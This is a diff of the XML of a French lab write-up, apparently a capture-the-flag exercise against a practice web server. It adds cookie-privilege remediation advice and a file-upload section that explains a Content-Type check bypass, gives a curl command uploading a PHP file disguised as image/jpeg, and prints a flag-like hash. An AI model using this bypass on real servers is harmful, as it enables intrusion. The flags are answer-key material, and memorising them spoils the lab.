+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="magenta"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="magenta"/>
+        </w:rPr>
+        <w:t>REMEDIATION</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>On ne doit jamais stocker de variables de contrôle de privilèges (comme "admin=</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>true</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>") de manière lisible ou prédictible dans un cookie côté client.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Donc il convient de procéder à ces modifications :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Utiliser </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>un ID de session (Session ID) aléatoire et complexe</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. La correspondance entre cet ID et les droits (admin: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>true</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>/false) doit être stockée exclusivement côté serveur (en base de données ou en RAM/Redis).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Utiliser des </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t xml:space="preserve">JWT (JSON Web </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>Tokens</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>) signés cryptographiquement</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>. Ainsi, si l'utilisateur change "false" en "</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>true</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>", la signature devient invalide et le serveur rejette la requête</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:sectPr>
-      <w:footerReference w:type="default" r:id="rId55"/>
+      <w:footerReference w:type="default" r:id="rId60"/>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1417" w:right="1417" w:bottom="1417" w:left="1417" w:header="708" w:footer="708" w:gutter="0"/>
       <w:cols w:space="708"/>
@@ -9009,7 +9844,7 @@
   <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
     <w:name w:val="Normal"/>
     <w:qFormat/>
-    <w:rsid w:val="00822324"/>
+    <w:rsid w:val="0048233C"/>
   </w:style>
   <w:style w:type="paragraph" w:styleId="Titre1">
     <w:name w:val="heading 1"/>
@@ -9212,7 +10047,6 @@
   <w:style w:type="character" w:default="1" w:styleId="Policepardfaut">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
-    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableauNormal">

--- a/LAB WebEX.docx
+++ b/LAB WebEX.docx
@@ -5457,8 +5457,28 @@
           <w:bCs/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
-        <w:t>ttaque BRUTE FORCE</w:t>
-      </w:r>
+        <w:t xml:space="preserve">ttaque </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>BRUTEFORCE</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>_Login</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -7085,18 +7105,985 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:pBdr>
+          <w:bottom w:val="double" w:sz="6" w:space="1" w:color="auto"/>
+        </w:pBdr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:ind w:left="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
         <w:jc w:val="center"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-        </w:rPr>
-      </w:pPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>Attaque C</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>ontent-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>T</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>ype_file_upload</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
+        </w:rPr>
+        <w:t>46910d9ce35b385885a9f7e2b336249d622f29b267a1771fbacf52133beddba8</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Depuis la page d’accueil allez en bas de page et cliquez sur ADD IMAGE </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId60" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Lienhypertexte"/>
+            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+            <w:color w:val="345964" w:themeColor="hyperlink" w:themeShade="BF"/>
+          </w:rPr>
+          <w:t>http://192.168.10.22/?page=upload</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Le formulaire de téléchargement d'images (?page=</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>upload</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>) implémente une vérification de sécurité basée sur l'en-tête HTTP Content-Type. Cependant, cette vérification est effectuée côté serveur en se fiant uniquement aux données envoyées par le client, sans analyser le contenu réel du fichier.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E1A0880" wp14:editId="04FEB199">
+            <wp:extent cx="4781550" cy="1904292"/>
+            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
+            <wp:docPr id="1375983584" name="Image 1" descr="Une image contenant texte, capture d’écran, conception&#10;&#10;Le contenu généré par l’IA peut être incorrect."/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1375983584" name="Image 1" descr="Une image contenant texte, capture d’écran, conception&#10;&#10;Le contenu généré par l’IA peut être incorrect."/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId61"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4789158" cy="1907322"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>L'attaque consiste à forcer la valeur du Content-Type lors de l'envoi d'un fichier PHP.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>Il faut c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t xml:space="preserve">réer un fichier </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>empty</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> sans contenu puis </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>l’injecter au serveur comme si c’était une image :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>curl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -X POST -H 'Content-Type: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>multipart</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>form</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>-data' \</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve">     -F '</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>Upload</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>send</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>' \</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve">     -F '</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>uploaded</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>=@empty.php;type=image/jpeg' \</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve">     'http://192.168.10.22/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>index.php?page</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>upload</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
